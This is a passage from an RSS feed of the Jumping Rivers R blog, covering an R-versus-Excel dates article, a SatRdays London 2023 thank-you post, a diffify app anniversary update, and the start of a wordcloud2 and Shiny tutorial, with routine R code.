&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;profit_year
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] 2014&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now let’s try to visualise how we would approach this task in Excel. To
replicate the task above, we would need multiple functions such as
&lt;code&gt;MAX()&lt;/code&gt;, &lt;code&gt;AVERAGEIFS()&lt;/code&gt; as well as date manipulation functions in order
to extract the relevant data before calculating averages. Excel’s
formula-based design and approach might require multiples steps and
complex formulas, which makes the process time consuming and prone to
errors. Handling dates in Excel is a challenge on its own, so while it
is possible to perform these calculations in Excel, it may not be as
efficient and straightforward as in R.&lt;/p&gt;
&lt;p&gt;Both R and Excel have their strengths in data manipulation and analysis.
Excel is commonly used due to its user-friendly, easily accessible
system, making it suitable for quick, basic tasks. However, when it
comes to complex data analysis and advanced programming capabilities, R
proves to be the superior choice. R, with its packages such as
{lubridate} and {dplyr}, provides intuitive syntax specifically designed
for handling dates. Its flexibility allows for seamless integration with
other statistical and visualisation packages.The ability to write
reproducible scripts in R enhances collaboration, documentation, and
automation.&lt;/p&gt;
&lt;p&gt;In addition to the advantages of using {lubridate}, there are also
several base R datetime functions that provide flexibility in handling
dates. Functions such as &lt;code&gt;as.Date()&lt;/code&gt; and &lt;code&gt;difftime()&lt;/code&gt; allow for date
manipulations. Base R provides a solid foundation for date operations,
and when combined with additional packages like {lubridate}, it offers a
powerful suite of tools for working with dates.&lt;/p&gt;
&lt;p&gt;While Excel remains useful for basic tasks, R’s approach makes it the
preferred tool for complex data manipulation and analysis. Its
flexibility, extensive community support, and comprehensive packages
make R the go-to choice for handling date operations, as well as other
advanced data analysis tasks.&lt;/p&gt;
&lt;p&gt;If you’re interested in learning more about using R for data analysis,
take a look at our &lt;a href="https://www.jumpingrivers.com/training/all-courses/" rel="external"&gt;training
course&lt;/a&gt; offerings;
there’s something for all levels.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/date-r-excel-datetimes-transition/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>SatRdays London 2023: Thanks for coming!</title><link>https://www.jumpingrivers.com/blog/satrdays-london-2023-conference-rstats-thanks-for-coming/</link><pubDate>Thu, 11 May 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/satrdays-london-2023-conference-rstats-thanks-for-coming/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/satrdays-london-2023-conference-rstats-thanks-for-coming/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/satrdays-london-2023-conference-rstats-thanks-for-coming/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;SatRdays returned to London last month, with a day packed full of talks from expert speakers across a variety of sectors! We&amp;rsquo;d like to take this opportunity to say a huge thank you to everybody involved in making the day a success!&lt;/p&gt;
&lt;h3 id="speakers"&gt;Speakers&lt;/h3&gt;
&lt;p&gt;Huge thanks to all of our speakers for your contributions for the day. It was great to see such a varied line up of talks, covering everything from Sidekicks of the Tidyverse, to Sustainability and EDI in the R Project, with much more in between. We&amp;rsquo;ll be adding any available talk materials to the &lt;a href="https://satrday-london-2023.jumpingrivers.com/" rel="external"&gt;SatRdays website&lt;/a&gt; in the coming days.&lt;/p&gt;
&lt;h4 id="keynotes"&gt;Keynotes&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.linkedin.com/in/juliasilge/" rel="external"&gt;Julia Silge&lt;/a&gt; (&lt;a href="https://posit.co/" rel="external"&gt;Posit&lt;/a&gt;): What is &amp;ldquo;production&amp;rdquo; anyway? MLOps for the curious&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.linkedin.com/in/olihawkins/" rel="external"&gt;Oli Hawkins&lt;/a&gt; (&lt;a href="https://www.ft.com/" rel="external"&gt;Financial Times&lt;/a&gt;): Why R is good for journalism&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="contributed-talks"&gt;Contributed talks&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.linkedin.com/in/michael-stevens-55a523b0/" rel="external"&gt;Michael Stevens&lt;/a&gt; &amp;amp; &lt;a href="https://www.linkedin.com/in/botanagin" rel="external"&gt;Botan Ağın&lt;/a&gt; (&lt;a href="https://samknows.com/" rel="external"&gt;SamKnows&lt;/a&gt;): AutRmatic reporting: billions of internet measurements, hundreds of reports and one repository to rule them all&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/russHyde" rel="external"&gt;Russ Hyde&lt;/a&gt; (&lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;Jumping Rivers&lt;/a&gt;): Does code quality even matter in data science?&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.linkedin.com/in/EllaKaye/" rel="external"&gt;Ella Kaye&lt;/a&gt; &amp;amp; &lt;a href="https://www.linkedin.com/in/heathrturnr/" rel="external"&gt;Heather Turner&lt;/a&gt; (&lt;a href="https://warwick.ac.uk/" rel="external"&gt;University of Warwick&lt;/a&gt;): Sustainability and EDI (Equality, Diversity and Inclusion) in the R Project&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.linkedin.com/in/datawookie/" rel="external"&gt;Andrew Collier&lt;/a&gt; (presenter) &amp;amp; &lt;a href="https://www.linkedin.com/in/bianca-peterson/" rel="external"&gt;Bianca Peterson&lt;/a&gt; (&lt;a href="https://www.fathomdata.dev/" rel="external"&gt;Fathom Data&lt;/a&gt;): Sidekicks of the Tidyverse&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.linkedin.com/in/jack-davison/" rel="external"&gt;Jack Davison&lt;/a&gt; (&lt;a href="https://www.ricardo.com/en/services/environmental-consulting" rel="external"&gt;Ricardo Energy &amp;amp; Environment&lt;/a&gt;): “Put it on a map!” – Developments in Air Quality Data Analysis&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.linkedin.com/in/vyara-apostolova-5a62a4136/" rel="external"&gt;Vyara Apostolova&lt;/a&gt; &amp;amp; &lt;a href="https://www.linkedin.com/in/laura-cole-7b7397123/" rel="external"&gt;Laura Cole&lt;/a&gt; (&lt;a href="https://www.nao.org.uk/" rel="external"&gt;National Audit Office&lt;/a&gt;): &lt;em&gt;ScRutinising government spending&lt;/em&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-satrdays-london-conference-rstats-thanks-for-coming"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;!-- This is where the ad goes! Just use the name of the shortcode file. --&gt;&lt;/p&gt;
&lt;h3 id="sponsors"&gt;Sponsors&lt;/h3&gt;
&lt;p&gt;Thanks again to our sponsors for supporting the day in various ways!&lt;/p&gt;
&lt;h4 id="cusp-london"&gt;&lt;a href="https://cusplondon.ac.uk/" rel="external"&gt;CUSP London&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;The Centre for Urban Science and Progress (CUSP) London provided our incredible venue, Bush House London, as well as all of the AV support and catering throughout the day.&lt;/p&gt;
&lt;p&gt;Based in London, UK, their mission is to support interdisciplinary research and innovation using Data Science in and for London.&lt;/p&gt;
&lt;h4 id="jumping-rivers"&gt;&lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;Jumping Rivers&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;If you&amp;rsquo;re here, you probably already know who we are, but just in case - We&amp;rsquo;re Jumping Rivers and we were the event organisers for SatRdays 2023.&lt;/p&gt;
&lt;p&gt;Jumping Rivers is an analytics company whose passion is data and machine learning. We help our clients move from data storage to data insights.&lt;/p&gt;
&lt;h4 id="posit"&gt;&lt;a href="https://posit.co/" rel="external"&gt;Posit&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;Posit supported the conference in many ways, including sending us our keynote speaker, Julia Silge, all the way over from the US!&lt;/p&gt;
&lt;p&gt;Posit aim to create open-source software for data science, scientific research, and technical communication, to enhance the production and consumption of knowledge by everyone, regardless of economic means.&lt;/p&gt;
&lt;h4 id="r-consortium"&gt;&lt;a href="https://www.r-consortium.org/" rel="external"&gt;R Consortium&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;The R consortium are the organisation behind SatRdays as a worldwide event.&lt;/p&gt;
&lt;p&gt;The central mission of the R Consortium is to work with and provide support to the R Foundation and to the key organizations developing, maintaining, distributing and using R software through the identification, development and implementation of infrastructure projects.&lt;/p&gt;
&lt;h3 id="you"&gt;You&lt;/h3&gt;
&lt;p&gt;Of course, a conference would not work with nobody there to see it, so thank you to all of our attendees, both in-person and virtual! We hope that you enjoyed the day as much as we did, and that you got a chance to network and learn and maybe share a bit of your own knowledge too!&lt;/p&gt;
&lt;h3 id="whats-next"&gt;What&amp;rsquo;s next?&lt;/h3&gt;
&lt;h4 id="satrdays-recordings"&gt;SatRdays recordings&lt;/h4&gt;
&lt;p&gt;Keep an eye out here and on our social media, as we&amp;rsquo;ll be sharing the recordings of some of the talks, so if you missed out on the day, you don&amp;rsquo;t have to miss out completely!&lt;/p&gt;
&lt;h4 id="shiny-in-production-confererence"&gt;Shiny in Production confererence&lt;/h4&gt;
&lt;p&gt;We also have our &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;Shiny in Production&lt;/a&gt; conference coming up later this year! This conference takes a look at shiny and other web based R packages, and includes an afternoon of workshops as well as a day of talks from subject experts. Take a look at the conference website to find out what we have lined up so far, and keep an eye out on our social media for further announcements.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/satrdays-london-2023-conference-rstats-thanks-for-coming/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Diffify - the anniversary update!</title><link>https://www.jumpingrivers.com/blog/diffify-anniversary-update-r-python/</link><pubDate>Tue, 02 May 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/diffify-anniversary-update-r-python/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/diffify-anniversary-update-r-python/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/diffify-anniversary-update-r-python/birthday_cake.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;We&amp;rsquo;ve just passed an important milestone for &lt;a href="https://diffify.com/" rel="external"&gt;diffify&lt;/a&gt;:
our app for tracking Python and R package releases has just turned 1 year old!
To mark this exciting occasion we are delighted to announce an &amp;ldquo;anniversary
update&amp;rdquo; featuring numerous quality of life improvements. This post will outline
the latest changes and tease at some exciting developments in the works…&lt;/p&gt;
&lt;p&gt;First, though, we would like to take this opportunity to thank everyone that
continues to use the app and welcome any new users to the service.
Your continued feedback via &lt;a href="https://twitter.com/jumping_uk" rel="external"&gt;social media&lt;/a&gt; and
&lt;a href="https://github.com/jumpingrivers/diffify/issues" rel="external"&gt;GitHub&lt;/a&gt; has played a major
role in shaping the last year of development.&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-diffify-anniversary-update-r-python"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;!-- This is where the ad goes! Just use the name of the shortcode file. --&gt;&lt;/p&gt;
&lt;h3 id="anniversary-update"&gt;Anniversary update&lt;/h3&gt;
&lt;p&gt;Let&amp;rsquo;s start by going through the changes introduced by today&amp;rsquo;s anniversary
update!&lt;/p&gt;
&lt;h4 id="latest-package-releases"&gt;Latest package releases&lt;/h4&gt;
&lt;p&gt;When you navigate to the &lt;a href="https://diffify.com/R" rel="external"&gt;R&lt;/a&gt; and
&lt;a href="https://diffify.com/python" rel="external"&gt;Python&lt;/a&gt; homepages, you will notice a new
window titled &amp;ldquo;Latest Releases and Updates&amp;rdquo;:&lt;/p&gt;
&lt;img src="latest_updates_screenshot.png" alt="A screenshot of the R packages homepage: As before, there is a dropdown to the left for selecting an R package. There is also a new window to the right titled 'Latest Releases and Updates', which shows a list of new and updated packages that have been published in the past day or so."/&gt;
&lt;p&gt;This lists any new or updated packages that have been published in the past day
or so. See a package that you&amp;rsquo;re using? Just click on it and you will be
redirected to the diffify summary with the latest changes.&lt;/p&gt;
&lt;h4 id="package-dependencies"&gt;Package dependencies&lt;/h4&gt;
&lt;p&gt;In response to user feedback, we have added cross-links for package
dependencies. Let&amp;rsquo;s check out the &lt;a href="https://diffify.com/python/matplotlib/3.6.3/3.7.1" rel="external"&gt;changes&lt;/a&gt;
between versions 3.6.3 and 3.7.1 of the &lt;strong&gt;matplotlib&lt;/strong&gt; package:&lt;/p&gt;
&lt;img src="dependencies_screenshot.png" alt="A screenshot of the package dependencies window: This is showing changes to the required dependencies between versions 3.6.3 and 3.7.1 of the matplotlib package. A new link icon is visible next to the name of each package. Clicking this would redirect users to the diffify summaries for those packages."/&gt;
&lt;p&gt;We see that the version requirement has changed for the &lt;strong&gt;numpy&lt;/strong&gt; and
&lt;strong&gt;pyparsing&lt;/strong&gt; packages. You may now be wondering what&amp;rsquo;s changed in the latest
versions of &lt;em&gt;those&lt;/em&gt; packages? Just click the link icons and that will open a new
tab with the two latest versions diffed.&lt;/p&gt;
&lt;p&gt;Quick disclaimer that not all package dependencies will have cross-links. We can
only provide cross-links for packages that are actually tracked by diffify,
which includes:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;All R packages published on &lt;a href="https://cran.r-project.org/" rel="external"&gt;CRAN&lt;/a&gt; (this does
&lt;em&gt;not&lt;/em&gt; include base-R packages)&lt;/li&gt;
&lt;li&gt;Any Python package that is in the &lt;a href="https://hugovk.github.io/top-pypi-packages/" rel="external"&gt;top 5000 PyPI packages&lt;/a&gt;
list and has an accessible wheel file on &lt;a href="https://pypi.org/" rel="external"&gt;PyPI&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="news-layout"&gt;News layout&lt;/h4&gt;
&lt;p&gt;We have made some changes to the way we display news for R packages. Let&amp;rsquo;s check
out the &lt;a href="https://diffify.com/R/dplyr/1.0.7/1.0.10" rel="external"&gt;changes&lt;/a&gt; between versions
1.0.7 and 1.0.10 of &lt;strong&gt;{dplyr}&lt;/strong&gt;. As before, the news can be accessed for all
versions since (but not including) the earlier version:&lt;/p&gt;
&lt;img src="news_screenshot.png" alt="A screenshot of the updated news window: Tabs are displayed for versions 1.0.8, 1.0.9 and 1.0.10 for the {dplyr} package. The 1.0.8 and 1.0.10 tabs have been expanded so that the news for these versions is displayed."/&gt;
&lt;p&gt;However, you&amp;rsquo;ll notice we now have an accordion layout with the version tabs
listed vertically. You are now free to have as many of these versions open as
you like, and scrolling through these will feel just like scrolling through a
NEWS.md file.&lt;/p&gt;
&lt;h4 id="dark-theme"&gt;Dark theme&lt;/h4&gt;
&lt;p&gt;Last but not least … we now have a dark theme! Just click the theme dropdown
at the top of the page, select &amp;ldquo;Theme: Dark&amp;rdquo; and enjoy this lower-light setting:&lt;/p&gt;
&lt;img src="dark_theme_screenshot.png" alt="A screenshot of the diffify webpage with the new dark theme applied: The webpage displays some changes between versions 1.1.0 and 1.1.2 of the {dplyr} package. With the dark theme applied, the background is now darkened and the colour of the text has been changed to white to maintain a high contrast."/&gt;
&lt;p&gt;On the topic of themes, we have also improved the default theme by incorporating
beneficial features from the old boosted contrast theme.&lt;/p&gt;
&lt;h3 id="other-recent-changes"&gt;Other recent changes&lt;/h3&gt;
&lt;p&gt;In case you missed them, here are some other improvements that have been made
over the past six months or so.&lt;/p&gt;
&lt;h4 id="maintainer-section"&gt;Maintainer section&lt;/h4&gt;
&lt;p&gt;Just below the version dropdowns you will notice a new maintainer section:&lt;/p&gt;
&lt;img src="maintainer_screenshot.png" alt="A screenshot of the expanded maintainer section located below the version dropdowns: This contains links to raise an issue and get a badge."/&gt;
&lt;p&gt;If you maintain a package that is featured on diffify, you can generate a
diffify badge to copy into your GitHub repository. Simply click &amp;ldquo;Get a badge&amp;rdquo;,
then paste the copied HTML code directly into an HTML or Markdown file (perhaps
your package README).&lt;/p&gt;
&lt;p&gt;As an example, here&amp;rsquo;s the badge generated for the &lt;strong&gt;{dplyr}&lt;/strong&gt; package:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://diffify.com/R/dplyr" target="_blank"&gt;&lt;img src="https://diffify.com/diffify-badge.svg" alt="The diffify page for the R package {dplyr}" style="width: 100px; max-width: 100%;"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Clicking this icon will redirect users to the &lt;strong&gt;{dplyr}&lt;/strong&gt; page on diffify.&lt;/p&gt;
&lt;h4 id="python-content"&gt;Python content&lt;/h4&gt;
&lt;p&gt;We have expanded the list of Python packages that are tracked by diffify to
cover the &lt;a href="https://hugovk.github.io/top-pypi-packages/" rel="external"&gt;top 5000 packages on PyPI&lt;/a&gt;
according to download counts. We are still only tracking packages that have a
wheel file on PyPI, but will look to expand this to zips and tars within the
next month.&lt;/p&gt;
&lt;h4 id="usability"&gt;Usability&lt;/h4&gt;
&lt;p&gt;We are continuing to optimise the usability and performance of the app. Recent
improvements include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;text wrapping on narrow screens&lt;/li&gt;
&lt;li&gt;smoother transitions using the backward and forward navigation buttons&lt;/li&gt;
&lt;li&gt;improvements to keyboard navigation.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="exciting-times-ahead"&gt;Exciting times ahead…&lt;/h3&gt;
&lt;p&gt;In the coming months we will be releasing two public APIs to accompany diffify.
We will release dedicated blogs to coincide with those releases, but here&amp;rsquo;s a
quick overview to whet your appetite:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Next month we will release an API which will allow R package authors to submit
development versions to diffify. Package authors and users will then be able
to use diffify to view changes between published versions and the latest
development version.&lt;/li&gt;
&lt;li&gt;The second API, which will take a little longer to develop, will act as a
command-line interface for submitting queries to diffify. This will allow you
to check whether installing the latest version of a package could break your
code.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We can&amp;rsquo;t wait to share more when these release!&lt;/p&gt;
&lt;h3 id="wrapping-up"&gt;Wrapping up&lt;/h3&gt;
&lt;p&gt;That&amp;rsquo;s all from us for today. Thanks again for your continued feedback on the
app, and please stay tuned for more updates…&lt;/p&gt;
&lt;p&gt;For further reading, you can check out our previous blog posts
&lt;a href="https://www.jumpingrivers.com/tags/diffify/" rel="external"&gt;here&lt;/a&gt;!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/diffify-anniversary-update-r-python/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>How to create a clickable world cloud with wordcloud2 and Shiny</title><link>https://www.jumpingrivers.com/blog/r-clickable-wordcloud-javascript-shiny/</link><pubDate>Thu, 27 Apr 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-clickable-wordcloud-javascript-shiny/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-clickable-wordcloud-javascript-shiny/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-clickable-wordcloud-javascript-shiny/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Word clouds are a visual representation of text data where words are
arranged in a cluster, with the size of each word reflecting its
frequency or importance in the data set. Word clouds are a great way of
displaying the most prominent topics or keywords in free text data
obtained from websites, social media feeds, reviews, articles and more.
If you want to learn more about working with unstructured text data, we
recommend attending our &lt;a href="https://www.jumpingrivers.com/training/course/r-text-mining-tidyverse-stringr-tidytext/" rel="external"&gt;Text Mining in
R&lt;/a&gt;
course&lt;/p&gt;
&lt;p&gt;Usually, a word cloud will be used solely as an output. But what if you
wanted to use a word cloud as an input? For example, let’s say we
visualised the most common words in reviews for a hotel. Imagine we
could then click on a specific word in the word cloud, and it would then
show us only the reviews which mention that specific word. Useful,
right?&lt;/p&gt;
&lt;p&gt;This blog will take you through creating a clickable word cloud in a
Shiny app, where the user can click any word in the word cloud to filter
an output table. We will be using the &lt;a href="https://github.com/rfordatascience/tidytuesday/blob/master/data/2021/2021-04-20/readme.md" rel="external"&gt;2021 TidyTuesday Netflix
titles&lt;/a&gt;
data set and the
&lt;a href="https://cran.r-project.org/web/packages/wordcloud2/vignettes/wordcloud.html" rel="external"&gt;{wordcloud2}&lt;/a&gt;
package to create our word cloud. We will then integrate it in a Shiny
app with a reactively filtered &lt;a href="https://rstudio.github.io/DT/" rel="external"&gt;{DT}&lt;/a&gt;
table output.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-clickable-wordcloud-javascript-shiny"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="creating-a-word-cloud-with-wordcloud2"&gt;Creating a word cloud with {wordcloud2}&lt;/h3&gt;
&lt;p&gt;{wordcloud2} is an R package which creates HTML-based word clouds, based
on &lt;a href="https://github.com/timdream/wordcloud2.js" rel="external"&gt;wordcloud2.js&lt;/a&gt;. The main
function is simply called &lt;code&gt;wordcloud2()&lt;/code&gt; and takes a word count data
frame as an input i.e. one column containing the words, one column
containing the frequencies of those words.&lt;/p&gt;
&lt;p&gt;Before creating the word cloud, we need to read in our data using the
&lt;a href="https://github.com/rfordatascience/tidytuesday" rel="external"&gt;{tidytuesdayR}&lt;/a&gt;
package. If you want to see the full source code for the final Shiny
app, &lt;a href="https://github.com/jumpingrivers/blog" rel="external"&gt;check out our GitHub&lt;/a&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tuesdata &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; tidytuesdayR&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;tt_load&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;2021-04-20&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;netflix_titles &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; tuesdata&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;netflix_titles
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To create our word count data frame, we will use a combination of
&lt;a href="https://dplyr.tidyverse.org/" rel="external"&gt;{dplyr}&lt;/a&gt; and
&lt;a href="https://github.com/juliasilge/tidytext" rel="external"&gt;{tidytext}&lt;/a&gt; functions. We
filter out words that are used in 10 titles or less to prevent our word
cloud from being too crowded.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;dplyr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidytext&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;word_counts &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; netflix_titles &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;unnest_tokens&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;word&amp;#34;&lt;/span&gt;, title) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;anti_join&lt;/span&gt;(stop_words, by &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;word&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;count&lt;/span&gt;(word) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(n &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;word_counts &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;desc&lt;/span&gt;(n))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 157 × 2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## word n&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;chr&amp;gt; &amp;lt;int&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 love 151&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 2 115&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 christmas 78&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 story 67&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 life 65&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 world 63&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 7 movie 60&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 8 time 54&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 9 de 46&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 10 american 45&lt;/span&gt;
